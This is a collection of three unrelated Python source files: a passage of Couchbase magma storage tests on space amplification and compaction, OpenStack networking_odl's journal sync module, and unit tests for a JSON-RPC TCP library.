tasks_info, self.cluster)
self.bucket_util.log_doc_ops_task_failures(tasks_info)
mutated += 1
if not self.next_half:
start = - (self.num_items - 1)
end = - (self.num_items // 2 - 1)
self.gen_update = self.genrate_docs_basic(start, end,
mutate=mutated)
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
mutated += 1
self.log.info("Waiting for ep-queues to get drained")
self.bucket_util._wait_for_stats_all_buckets(
self.cluster, self.cluster.buckets, timeout=3600)
###################################################################
'''
STEP - 2
-- Space Amplification check after each update iteration.
'''
self.log.debug("Step 2, Iteration= {}".format(i+1))
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg_stats.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg_stats.format("KV"))
disk_usage = self.get_disk_usage(
self.buckets[0], self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.info("Update Iteration- {}, Disk Usage- {}MB\
".format(count+1, _res))
self.assertIs(
_res > 2.5 * self.disk_usage[self.disk_usage.keys()[0]],
False, msg.format("update", count+1, _res, 2.5,
self.disk_usage[self.disk_usage.keys()[0]]))
count += 1
self.update_itr += self.update_itr
###################################################################
'''
STEP - 3
-- Delete all the items.
'''
self.log.debug("Step 3, Iteration {}".format(i+1))
self.doc_ops = "delete"
self.delete_start = 0
self.delete_end = self.num_items
if self.rev_del:
self.delete_start = -int(self.num_items - 1)
self.delete_end = 1
self.generate_docs(doc_ops="delete")
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=3600)
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.num_items)
###################################################################
'''
STEP - 4
-- Space Amplification Check after deletion.
'''
self.log.debug("Step 4, Iteration {}".format(i+1))
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg_stats.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg_stats.format("KV"))
disk_usage = self.get_disk_usage(self.buckets[0],
self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.info("Delete Iteration {}, Disk Usage- {}MB\
".format(i+1, _res))
self.assertIs(
_res > 1 * self.disk_usage[
self.disk_usage.keys()[0]],
False, msg.format(
"delete", i+1, _res, 1,
self.disk_usage[self.disk_usage.keys()[0]]))
###################################################################
'''
STEP - 5
-- ReCreation of docs.
'''
self.log.debug("Step 5, Iteration= {}".format(i+1))
self.gen_create = copy.deepcopy(self.gen_delete)
self.doc_ops = "create"
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=3600)
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.num_items)
###################################################################
'''
STEP - 6
-- Space Amplification Check after Recreation.
'''
self.log.debug("Step 6, Iteration= {}".format(i+1))
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg_stats.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg_stats.format("KV"))
disk_usage = self.get_disk_usage(self.buckets[0],
self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.info("Create Iteration{}, Disk Usage= {}MB \
".format(i+1, _res))
self.assertIs(_res > 1.5 * self.disk_usage[
self.disk_usage.keys()[0]],
False, msg.format("Create", _res, i+1, 1.5,
self.disk_usage[self.disk_usage.keys()[0]]))
###################################################################
'''
STEP - 7
-- Validate data
-- Data validation is only for the creates in last iterations.
'''
self.log.debug("Step 7, Iteration= {}".format(i+1))
self.validate_data("create", self.gen_create)
self.log.info("====test_update_rev_update ends====")
def test_update_single_doc_n_times(self):
"""
Test Focus: Update single/same doc n times
Note: Multithreading is used to update a
single doc. Since we are not worried
about the final mutate value of the
document, semaphores have been avoided.
Multithreading also speeds up the
execution of the test.
"""
self.log.info("test_update_single_doc_n_times starts")
self.doc_ops = "update"
self.client = SDKClient([self.cluster.master],
self.cluster.buckets[0],
scope=CbServer.default_scope,
collection=CbServer.default_collection)
self.gen_update = self.genrate_docs_basic(start=0, end=1)
key, val = self.gen_update.next()
for node in self.cluster.nodes_in_cluster:
shell = RemoteMachineShellConnection(node)
shell.restart_couchbase()
shell.disconnect()
self.assertTrue(
self.bucket_util._wait_warmup_completed(
[self.cluster.master],
self.cluster.buckets[0],
wait_time=self.wait_timeout * 10))
def upsert_doc(start_num, end_num, key_obj, val_obj):
for i in range(start_num, end_num):
val_obj.put("mutated", i)
self.client.upsert(key_obj, val_obj)
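# Ten threads upsert the same key 100000 times each; the final "mutated" value is
# intentionally not synchronized (see the docstring above).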
threads = []
start = 0
end = 0
for _ in range(10):
start = end
end += 100000
th = threading.Thread(
target=upsert_doc, args=[start, end, key, val])
th.start()
threads.append(th)
for th in threads:
th.join()
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=3600)
# Space amplification check
msg_stats = "Fragmentation value for {} stats exceeds\
the configured value"
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg_stats.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg_stats.format("KV"))
disk_usage = self.get_disk_usage(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.log.debug("Disk usage after updates {}".format(
disk_usage))
_res = disk_usage[0]
msg = "Disk Usage = {}MB exceeds 2.2 times \
from Actual disk usage = {}MB"
self.assertIs(
_res > 2.2 * self.disk_usage[
self.disk_usage.keys()[0]],
False,
msg.format(_res, self.disk_usage[self.disk_usage.keys()[0]]))
# Space amplification check ends
success, fail = self.client.get_multi([key],
self.wait_timeout)
self.assertIs(key in success, True,
msg="key {} doesn't exist\
".format(key))
actual_val = dict()
expected_val = Json.loads(val.toString())
actual_val = Json.loads(success[key][
'value'].toString())
self.log.debug("Expected_val= {} and actual_val = {}\
".format(expected_val, actual_val))
self.assertIs(expected_val == actual_val, True,
msg="expected_val-{} != Actual_val-{}\
".format(expected_val, actual_val))
self.change_swap_space(self.cluster.nodes_in_cluster,
disable=False)
self.log.info("====test_update_single_doc_n_times ends====")
def test_move_val_btwn_key_and_seq_trees(self):
"""
Test Focus: Update items such that values move
between the sequence tree and the key tree.
STEPS:
-- Update items with a new size, so that
items move from sequence tree to key
tree or vice versa
-- Do data validation
-- Again update items with initial size
-- Check space amplification
-- Again validate documents
"""
self.log.info("test_move_val_btwn_key_and_seq_trees starts")
msg_stats = "Fragmentation value for {} stats exceeds\
the configured value"
count = 0
keyTree, seqTree = (self.get_disk_usage(
self.buckets[0],
self.cluster.nodes_in_cluster)[2:4])
self.log.debug("Disk usage after pure creates {}".format((
self.disk_usage, keyTree, seqTree)))
initial_doc_size = self.doc_size
upsert_size = 0
if self.doc_size < 32:
upsert_size = 2048
while count < self.test_itr:
self.log.info("Update Iteration count == {}".format(count))
for node in self.cluster.nodes_in_cluster:
shell = RemoteMachineShellConnection(node)
shell.kill_memcached()
shell.disconnect()
self.assertTrue(self.bucket_util._wait_warmup_completed(
[self.cluster.master],
self.cluster.buckets[0],
wait_time=self.wait_timeout * 10))
#######################################################################
'''
STEP - 1, Update items with changed/new size
'''
self.log.info("Step 1, Iteration= {}".format(count+1))
self.doc_ops = "update"
self.update_start = 0
self.update_end = self.num_items
if self.rev_update:
self.update_start = -int(self.num_items - 1)
self.update_end = 1
self.doc_size = upsert_size
self.generate_docs()
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=3600)
if upsert_size > 32:
seqTree_update = (self.get_disk_usage(
self.buckets[0],
self.cluster.nodes_in_cluster)[-1])
self.log.info("For upsert_size > 32 seqIndex usage-{}\
".format(seqTree_update))
#######################################################################
'''
STEP - 2, Validate data after initial upsert
'''
self.log.info("Step 2, Iteration= {}".format(count+1))
self.validate_data("update", self.gen_update)
#######################################################################
'''
STEP - 3, Updating items with changed doc size
to move between trees
'''
self.log.info("Step 3, Iteration= {}".format(count+1))
self.doc_size = initial_doc_size
self.generate_docs()
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=3600)
#######################################################################
'''
STEP - 4, Space Amplification Checks
'''
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg_stats.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg_stats.format("KV"))
disk_usage = self.get_disk_usage(
self.buckets[0], self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.info("disk usage after upsert count {} is {}MB \
".format(count+1, _res))
if self.doc_size > 32:
self.assertIs(
_res > 1.5 * self.disk_usage[self.disk_usage.keys()[0]],
False, "Disk Usage {} After \
update count {} exceeds \
Actual disk usage {} by 1.5 \
times".format(_res, count+1,
self.disk_usage[self.disk_usage.keys()[0]]))
else:
self.assertIs(disk_usage[3] > 0.5 * seqTree_update,
False, " Current seqTree usage-{} exceeds by'\n'\
0.5 times from the earlier '\n' \
seqTree usage (after update) -{} \
".format(disk_usage[3], seqTree_update))
count += 1
#######################################################################
'''
STEP - 5, Data validation
'''
self.log.info("Step 5, Iteration= {}".format(count+1))
self.validate_data("update", self.gen_update)
#######################################################################
self.change_swap_space(self.cluster.nodes_in_cluster, disable=False)
self.log.info("====test_move_docs_btwn_key_and_seq_trees ends====")
def test_parallel_create_update(self):
"""
STEPS:
-- Create new items and update already
existing items
-- Check disk_usage after each Iteration
-- Data validation for last iteration
"""
self.log.info("test_parallel_create_update starts")
count = 1
init_items = copy.deepcopy(self.num_items)
self.doc_ops = "create:update"
self.update_start = 0
self.update_end = self.num_items
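# Each iteration creates a fresh batch of init_items docs while updating the batch
# created in the previous iteration (the update range trails the create range).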
while count <= self.test_itr:
self.log.info("Iteration {}".format(count))
self.create_start = self.num_items
self.create_end = self.num_items+init_items
if self.rev_write:
self.create_start = -int(self.num_items+init_items - 1)
self.create_end = -int(self.num_items - 1)
self.log.info("Iteration : {}, create_start {} and create_end {}"
.format(count, self.create_start, self.create_end))
self.log.info("Iteration : {}, update_start {} and update_end {}"
.format(count, self.update_start, self.update_end))
self.generate_docs()
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=3600)
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.num_items)
if count == self.test_itr:
self.validate_data("update", self.gen_update)
self.update_start = copy.deepcopy(self.create_start)
self.update_end = copy.deepcopy(self.create_end)
disk_usage = self.get_disk_usage(
self.buckets[0],
self.cluster.nodes_in_cluster)
if self.doc_size <= 32:
self.assertIs(
disk_usage[2] >= disk_usage[3], True,
"seqIndex usage = {}MB'\n' \
after Iteration {}'\n' \
exceeds keyIndex usage={}MB'\n' \
".format(disk_usage[3],
count,
disk_usage[2]))
self.assertIs(
disk_usage[0] > 2.2 * ((count+1) * self.disk_usage[
self.disk_usage.keys()[0]]),
False, "Disk Usage {}MB After '\n\'\
Updates exceeds '\n\'\
Actual disk usage {}MB by '\n'\
2.2 times".format(disk_usage[0],
((count+1) * self.disk_usage[
self.disk_usage.keys()[0]])))
count += 1
if not self.windows_platform:
self.change_swap_space(self.cluster.nodes_in_cluster, disable=False)
self.log.info("====test_parallel_create_update ends====")
def test_upsert_docs_n_times_with_intermittent_compaction(self):
"""
Test Focus: Update items n times and
during update keep triggering full
compaction
STEPS:
-- Update items n times
-- Keep triggering full compaction
-- After all iterations validate the data
"""
self.log.info("=====test_upsert_docs_n_times_with_intermittent_compaction starts=====")
self.mutate = 0
count = 0
self.doc_ops = "update"
self.update_start = 0
self.update_end = self.init_items_per_collection
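# Background thread that keeps triggering full compaction until stop_compaction
# is set, so compactions overlap with the update workload.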
def full_compaction():
self.stop_compaction = False
loop_itr = 1
while not self.stop_compaction:
self.bucket_util._run_compaction(self.cluster,
number_of_times=1)
self.sleep(5, "Done with Compaction Iteration == {}, sleep before next compaction".
format(loop_itr))
loop_itr += 1
self.compaction_th = threading.Thread(target=full_compaction)
self.compaction_th.start()
while count < self.test_itr:
self.log.info("Iteration == {}".format(count+1))
#######################################################################
'''
STEP - 1, Update Items
'''
self.generate_docs(doc_ops="update")
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
count += 1
self.stop_compaction = True
self.compaction_th.join()
'''
STEP - 2, Data Validation
'''
self.validate_data("update", self.gen_update)
self.log.info("=====test_upsert_docs_n_times_with_intermittent_compaction ends=====")
|
journal.py
|
# Copyright (c) 2015 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from datetime import datetime
import threading
import time
from neutron_lib.callbacks import events
from neutron_lib.callbacks import registry
from neutron_lib import context as nl_context
from neutron_lib.db import api as db_api
from neutron_lib.plugins import directory
from oslo_config import cfg
from oslo_db import exception
from oslo_log import log as logging
from requests import exceptions
from networking_odl.common import client
from networking_odl.common import constants as odl_const
from networking_odl.common import filters
from networking_odl.common import utils
from networking_odl.db import db
from networking_odl.journal import dependency_validations
LOG = logging.getLogger(__name__)
MAKE_URL = {}
LOG_ENTRY_TEMPLATE = ("%(log_type)s (Entry ID: %(entry_id)s) - %(op)s "
"%(obj_type)s %(obj_id)s (Time stamp: %(timestamp)s)")
LOG_RECORDED = 'Recorded'
LOG_PROCESSING = 'Processing'
LOG_COMPLETED = 'Completed'
LOG_ERROR_PROCESSING = 'Error while processing'
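# Decorator: after the wrapped method returns, wake the owning object's journal sync
# thread (obj.journal.set_sync_event()) so newly recorded entries are processed promptly.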
def call_thread_on_end(func):
def new_func(obj, *args, **kwargs):
return_value = func(obj, *args, **kwargs)
obj.journal.set_sync_event()
return return_value
return new_func
def _enrich_port(plugin_context, ml2_context, object_type, operation, data):
"""Enrich the port with additional information needed by ODL"""
# NOTE(yamahata): workaround for ODL neutron northbound.
# It passes security groups in the port as a list of dicts for historical reasons.
# Keep that format for compatibility.
# TODO(yamahata): drop this format conversion.
if data[odl_const.ODL_SGS]:
groups = [{'id': id_} for id_ in data['security_groups']]
else:
groups = []
new_data = copy.deepcopy(data)
new_data[odl_const.ODL_SGS] = groups
# NOTE(yamahata): workaround for port creation for routers.
# tenant_id='' (empty string) is passed when a port is created
# internally by the l3 plugin for a router.
# On the other hand, ODL doesn't accept an empty string for tenant_id.
# In that case, deduce tenant_id from network_id for now.
# Right fix: modify Neutron so that it doesn't allow an empty string
# for tenant_id, even for ports created for internal use.
# TODO(yamahata): eliminate this workaround when the neutron side
# is fixed
# assert port['tenant_id'] != ''
if ('tenant_id' not in new_data or new_data['tenant_id'] == ''):
if ml2_context:
network = ml2_context._network_context._network
else:
plugin = directory.get_plugin()
network = plugin.get_network(plugin_context,
new_data['network_id'])
new_data['tenant_id'] = network['tenant_id']
return new_data
def _log_entry(log_type, entry, log_level=logging.INFO, **kwargs):
delta = datetime.now() - datetime.min
timestamp = delta.total_seconds()
log_dict = {'log_type': log_type, 'op': entry.operation,
'obj_type': entry.object_type, 'obj_id': entry.object_uuid,
'entry_id': entry.seqnum, 'timestamp': timestamp}
LOG.log(log_level, LOG_ENTRY_TEMPLATE, log_dict, **kwargs)
def record(plugin_context, object_type, object_uuid, operation, data,
ml2_context=None):
if (object_type == odl_const.ODL_PORT and
operation in (odl_const.ODL_CREATE, odl_const.ODL_UPDATE)):
data = _enrich_port(
plugin_context, ml2_context, object_type, operation, data)
# Calculate depending_on on other journal entries
depending_on = dependency_validations.calculate(
plugin_context, operation, object_type, object_uuid, data)
# NOTE(mpeterson): Between the moment that a dependency is calculated and
# the new entry is recorded in the journal, an operation can occur that
# would make the dependency irrelevant. In that case we request a retry.
# For more details, read the commit message that introduced this comment.
try:
entry = db.create_pending_row(
plugin_context, object_type, object_uuid, operation, data,
depending_on=depending_on)
except exception.DBReferenceError as e:
raise exception.RetryRequest(e)
_log_entry(LOG_RECORDED, entry)
LOG.debug('Entry with ID %(entry_id)s depends on these entries: '
'%(depending_on)s',
{'entry_id': entry.seqnum,
'depending_on': [d.seqnum for d in depending_on]})
@db_api.retry_if_session_inactive()
@db_api.CONTEXT_WRITER.savepoint
def entry_complete(context, entry):
if cfg.CONF.ml2_odl.completed_rows_retention == 0:
db.delete_row(context, entry)
else:
db.update_db_row_state(context, entry, odl_const.COMPLETED)
db.delete_dependency(context, entry)
@db_api.retry_if_session_inactive()
@db_api.CONTEXT_WRITER.savepoint
def entry_reset(context, entry):
db.update_db_row_state(context, entry, odl_const.PENDING)
@db_api.retry_if_session_inactive()
@db_api.CONTEXT_WRITER.savepoint
def entry_update_state_by_retry_count(context, entry, retry_count):
db.update_pending_db_row_retry(context, entry, retry_count)
def _make_url(row):
url_object = utils.make_url_object(row.object_type)
urlpath = ''
if row.operation == odl_const.ODL_CREATE:
urlpath = url_object
else:
urlpath = url_object + '/' + row.object_uuid
return urlpath
def register_url_builder(object_type, method):
MAKE_URL[object_type] = method
def _build_url(row):
return MAKE_URL.get(row.object_type, _make_url)(row)
class OpenDaylightJournalThread(object):
"""Thread worker for the OpenDaylight Journal Database."""
# make these parameters configurable?
_RETRY_SLEEP_MIN = 0.1
_RETRY_SLEEP_MAX = 60
def __init__(self, start_thread=True):
self.client = client.OpenDaylightRestClient.create_client()
self._max_retry_count = cfg.CONF.ml2_odl.retry_count
self._sleep_time = self._RETRY_SLEEP_MIN
self.event = threading.Event()
self._odl_sync_thread = self._create_odl_sync_thread()
self._odl_sync_thread_stop = threading.Event()
if start_thread:
self.start()
def _create_odl_sync_thread(self):
return threading.Thread(name='sync', target=self.run_sync_thread)
def start(self):
# Start the sync thread
LOG.debug("Starting a new sync thread")
if self._odl_sync_thread_stop.is_set():
self._odl_sync_thread_stop.clear()
self._odl_sync_thread = self._create_odl_sync_thread()
if not self._odl_sync_thread.is_alive():
self._odl_sync_thread.start()
def stop(self, timeout=None):
"""Allows to stop the sync thread.
Args:
timeout (float): Time in seconds to wait for joining or None for
no timeout.
"""
# Stop the sync thread
LOG.debug("Stopping the sync thread")
if self._odl_sync_thread.is_alive():
self._odl_sync_thread_stop.set()
# Process the journal one last time before stopping.
self.set_sync_event()
self._odl_sync_thread.join(timeout)
def set_sync_event(self):
self.event.set()
@staticmethod
def _json_data(row):
data = copy.deepcopy(row.data)
filters.filter_for_odl(row.object_type, row.operation, data)
if row.operation == odl_const.ODL_CREATE:
method = 'post'
to_send = {row.object_type: data}
elif row.operation == odl_const.ODL_UPDATE:
method = 'put'
to_send = {row.object_type: data}
elif row.operation == odl_const.ODL_DELETE:
method = 'delete'
to_send = None
return method, _build_url(row), to_send
def run_sync_thread(self):
while not self._odl_sync_thread_stop.is_set():
try:
self.event.wait()
self.event.clear()
self.sync_pending_entries()
except Exception:
# Catch exceptions to protect the thread while running
LOG.exception("Error on run_sync_thread")
def sync_pending_entries(self):
LOG.debug("Start processing journal entries")
context = nl_context.get_admin_context()
entry = db.get_oldest_pending_db_row_with_lock(context)
if entry is None:
LOG.debug("No journal entries to process")
return
while entry is not None:
stop_processing = self._sync_entry(context, entry)
if stop_processing:
break
entry = db.get_oldest_pending_db_row_with_lock(context)
LOG.debug("Finished processing journal entries")
def _retry_sleep(self):
# When something goes wrong with the connection to ODL, don't busy-loop,
# because the next attempt is likely to hit the same issue.
# Wait a while to allow recovery.
time.sleep(self._sleep_time)
self._sleep_time = min(self._sleep_time * 2, self._RETRY_SLEEP_MAX)
def _retry_reset(self):
self._sleep_time = self._RETRY_SLEEP_MIN
def _sync_entry(self, context, entry):
_log_entry(LOG_PROCESSING, entry)
method, urlpath, to_send = self._json_data(entry)
# TODO(mkolesni): This logic is weirdly written, need to refactor it.
try:
self.client.sendjson(method, urlpath, to_send)
registry.publish(entry.object_type, odl_const.BEFORE_COMPLETE,
self,
payload=events.DBEventPayload(
context,
metadata={'operation': entry.operation,
'row': entry}))
entry_complete(context, entry)
self._retry_reset()
_log_entry(LOG_COMPLETED, entry)
except exceptions.ConnectionError:
# Don't raise the retry count, just log an error & break
entry_reset(context, entry)
LOG.error("Cannot connect to the OpenDaylight Controller,"
" will not process additional entries")
self._retry_sleep()
return True
except Exception:
_log_entry(LOG_ERROR_PROCESSING, entry,
log_level=logging.ERROR, exc_info=True)
entry_update_state_by_retry_count(
context, entry, self._max_retry_count)
return False
|
tests.py
|
"""
These are mostly tests taken verbatim from the JSON RPC v2 Spec document:
http://groups.google.com/group/json-rpc/web/json-rpc-2-0
JSON-RPC v1 tests will be coming soon, as will tests for library "features"
like class translation, etc.
"""
from jsonrpctcp import connect, config, history
from jsonrpctcp.server import Server
from jsonrpctcp import logger
from jsonrpctcp.errors import ProtocolError, EncryptionMissing
import unittest
import os
import time
try:
import json
except ImportError:
import simplejson as json
from threading import Thread
import signal
import logging
CLIENT = connect('127.0.0.1', 8000)
class TestCompatibility(unittest.TestCase):
def setUp(self):
pass
# Version 2.0 Tests
def test_positional(self):
""" Positional arguments in a single call """
result = CLIENT.subtract(23, 42)
self.assertTrue(result == -19)
result = CLIENT.subtract(42, 23)
self.assertTrue(result == 19)
request = json.loads(history.request)
response = json.loads(history.response)
verify_request = {
"jsonrpc": "2.0", "method": "subtract",
"params": [42, 23], "id": request['id']
}
verify_response = {
"jsonrpc": "2.0", "result": 19, "id": request['id']
}
self.assertTrue(request == verify_request)
self.assertTrue(response == verify_response)
def test_named(self):
""" Named arguments in a single call """
result = CLIENT.subtract(subtrahend=23, minuend=42)
self.assertTrue(result == 19)
result = CLIENT.subtract(minuend=42, subtrahend=23)
self.assertTrue(result == 19)
request = json.loads(history.request)
response = json.loads(history.response)
verify_request = {
"jsonrpc": "2.0", "method": "subtract",
"params": {"subtrahend": 23, "minuend": 42},
"id": request['id']
}
verify_response = {
"jsonrpc": "2.0", "result": 19, "id": request['id']
}
self.assertTrue(request == verify_request)
self.assertTrue(response == verify_response)
def test_notification(self):
""" Testing a notification (response should be null) """
result = CLIENT._notification.update(1, 2, 3, 4, 5)
self.assertTrue(result == None)
request = json.loads(history.request)
response = history.response
verify_request = {
"jsonrpc": "2.0", "method": "update", "params": [1,2,3,4,5]
}
verify_response = ''
self.assertTrue(request == verify_request)
self.assertTrue(response == verify_response)
def test_non_existent_method(self):
""" Testing a non existent method (raises -32601) """
self.assertRaises(ProtocolError, CLIENT.foobar)
request = json.loads(history.request)
response = json.loads(history.response)
verify_request = {
"jsonrpc": "2.0", "method": "foobar", "id": request['id']
}
verify_response = {
"jsonrpc": "2.0",
"error":
{"code": -32601, "message": response['error']['message']},
"id": request['id']
}
self.assertTrue(request == verify_request)
self.assertTrue(response == verify_response)
def test_invalid_json(self):
""" Tests an invalid JSON string (raises -32700) """
invalid_json = '{"jsonrpc": "2.0", "method": "foobar, '+ \
'"params": "bar", "baz]'
response = CLIENT._send_and_receive(invalid_json)
response = json.loads(history.response)
verify_response = json.loads(
'{"jsonrpc": "2.0", "error": {"code": -32700,'+
' "message": "Parse error."}, "id": null}'
)
verify_response['error']['message'] = response['error']['message']
self.assertTrue(response == verify_response)
def test_invalid_request(self):
invalid_request = '{"jsonrpc": "2.0", "method": 1, "params": "bar"}'
response = CLIENT._send_and_receive(invalid_request)
response = json.loads(history.response)
verify_response = json.loads(
'{"jsonrpc": "2.0", "error": {"code": -32600, '+
'"message": "Invalid Request."}, "id": null}'
)
verify_response['error']['message'] = response['error']['message']
self.assertTrue(response == verify_response)
def test_batch_invalid_json(self):
invalid_request = '[ {"jsonrpc": "2.0", "method": "sum", '+ \
'"params": [1,2,4], "id": "1"},{"jsonrpc": "2.0", "method" ]'
response = CLIENT._send_and_receive(
invalid_request, batch=True
)
response = json.loads(history.response)
verify_response = json.loads(
'{"jsonrpc": "2.0", "error": {"code": -32700,'+
'"message": "Parse error."}, "id": null}'
)
verify_response['error']['message'] = response['error']['message']
self.assertTrue(response == verify_response)
def test_empty_array(self):
invalid_request = '[]'
response = CLIENT._send_and_receive(invalid_request)
response = json.loads(history.response)
verify_response = json.loads(
'{"jsonrpc": "2.0", "error": {"code": -32600, '+
'"message": "Invalid Request."}, "id": null}'
)
verify_response['error']['message'] = response['error']['message']
self.assertTrue(response == verify_response)
def test_nonempty_array(self):
invalid_request = '[1,2]'
request_obj = json.loads(invalid_request)
response = CLIENT._send_and_receive(invalid_request)
response = json.loads(history.response)
self.assertTrue(len(response) == len(request_obj))
for resp in response:
verify_resp = json.loads(
'{"jsonrpc": "2.0", "error": {"code": -32600, '+
'"message": "Invalid Request."}, "id": null}'
)
verify_resp['error']['message'] = resp['error']['message']
self.assertTrue(resp == verify_resp)
def test_batch(self):
multicall = CLIENT._batch()
multicall.sum(1,2,4)
multicall._notification.notify_hello(7)
multicall.subtract(42,23)
multicall.foo.get(name='myself')
multicall.get_data()
job_requests = [j._request() for j in multicall._requests]
job_requests.insert(3, {"foo": "boo"})
json_requests = '[%s]' % ','.join(
map(lambda x:json.dumps(x), job_requests)
)
requests = json.loads(json_requests)
response_text = CLIENT._send_and_receive(json_requests, batch=True)
responses = json.loads(response_text)
verify_requests = json.loads("""[
{"jsonrpc": "2.0", "method": "sum", "params": [1,2,4], "id": "1"},
{"jsonrpc": "2.0", "method": "notify_hello", "params": [7]},
{"jsonrpc": "2.0", "method": "subtract", "params": [42,23], "id": "2"},
{"foo": "boo"},
{"jsonrpc": "2.0", "method": "foo.get", "params": {"name": "myself"}, "id": "5"},
{"jsonrpc": "2.0", "method": "get_data", "id": "9"}
]""")
# Thankfully, these are in order so testing is pretty simple.
verify_responses = json.loads("""[
{"jsonrpc": "2.0", "result": 7, "id": "1"},
{"jsonrpc": "2.0", "result": 19, "id": "2"},
{"jsonrpc": "2.0", "error": {"code": -32600, "message": "Invalid Request."}, "id": null},
{"jsonrpc": "2.0", "error": {"code": -32601, "message": "Method not found."}, "id": "5"},
{"jsonrpc": "2.0", "result": ["hello", 5], "id": "9"}
]""")
self.assertTrue(len(requests) == len(verify_requests))
self.assertTrue(len(responses) == len(verify_responses))
responses_by_id = {}
response_i = 0
for i in range(len(requests)):
verify_request = verify_requests[i]
request = requests[i]
response = None
if request.get('method') != 'notify_hello':
req_id = request.get('id')
if verify_request.has_key('id'):
verify_request['id'] = req_id
verify_response = verify_responses[response_i]
verify_response['id'] = req_id
responses_by_id[req_id] = verify_response
response_i += 1
response = verify_response
self.assertTrue(request == verify_request)
for response in responses:
verify_response = responses_by_id.get(response.get('id'))
if verify_response.has_key('error'):
verify_response['error']['message'] = \
response['error']['message']
self.assertTrue(response == verify_response)
def test_batch_notifications(self):
multicall = CLIENT._batch()
multicall._notification.notify_sum(1, 2, 4)
multicall._notification.notify_hello(7)
results = multicall()
result_list = []
for result in results:
result_list.append(result)
self.assertTrue(len(result_list) == 0)
valid_request = json.loads(
'[{"jsonrpc": "2.0", "method": "notify_sum", '+
'"params": [1,2,4]},{"jsonrpc": "2.0", '+
'"method": "notify_hello", "params": [7]}]'
)
request = json.loads(history.request)
self.assertTrue(len(request) == len(valid_request))
for i in range(len(request)):
req = request[i]
valid_req = valid_request[i]
self.assertTrue(req == valid_req)
self.assertTrue(history.response == '')
# Other tests
def test_namespace(self):
response = CLIENT.namespace.sum(1,2,4)
request = json.loads(history.request)
response = json.loads(history.response)
verify_request = {
"jsonrpc": "2.0", "params": [1, 2, 4],
"id": "5", "method": "namespace.sum"
}
verify_response = {
"jsonrpc": "2.0", "result": 7, "id": "5"
}
verify_request['id'] = request['id']
verify_response['id'] = request['id']
self.assertTrue(verify_request == request)
self.assertTrue(verify_response == response)
class TestEncryption(unittest.TestCase):
def setUp(self):
config.secret = '12345abcdef67890'
def test_no_encryption(self):
crypt = config.crypt
config.crypt = None
self.assertRaises(
EncryptionMissing, connect, 'localhost', 8001, config.secret
)
config.crypt = crypt
def test_encryption(self):
client = connect('localhost', 8001, config.secret)
result = client.sum(49, 51)
self.assertTrue(result == 100)
def tearDown(self):
config.secret = None
""" Test Methods """
def subtract(minuend, subtrahend):
""" Using the keywords from the JSON-RPC v2 doc """
return minuend-subtrahend
def update(*args):
return args
def summation(*args):
return sum(args)
def notify_hello(*args):
return args
def get_data():
return ['hello', 5]
def test_set_up():
# Because 'setUp' on unittests is called multiple times,
# and starting a server each time is inefficient / a headache.
# Start the normal server
server = Server(('', 8000))
server.add_handler(summation, 'sum')
server.add_handler(summation, 'notify_sum')
server.add_handler(notify_hello)
server.add_handler(subtract)
server.add_handler(update)
server.add_handler(get_data)
server.add_handler(summation, 'namespace.sum')
server_proc = Thread(target=server.serve)
server_proc.daemon = True
server_proc.start()
#Starting secure server
server2 = Server(('', 8001))
server2.add_handler(summation, 'sum')
server_proc2 = Thread(target=server2.serve)
server_proc2.daemon = True
server_proc2.start()
time.sleep(1) # give it time to start up
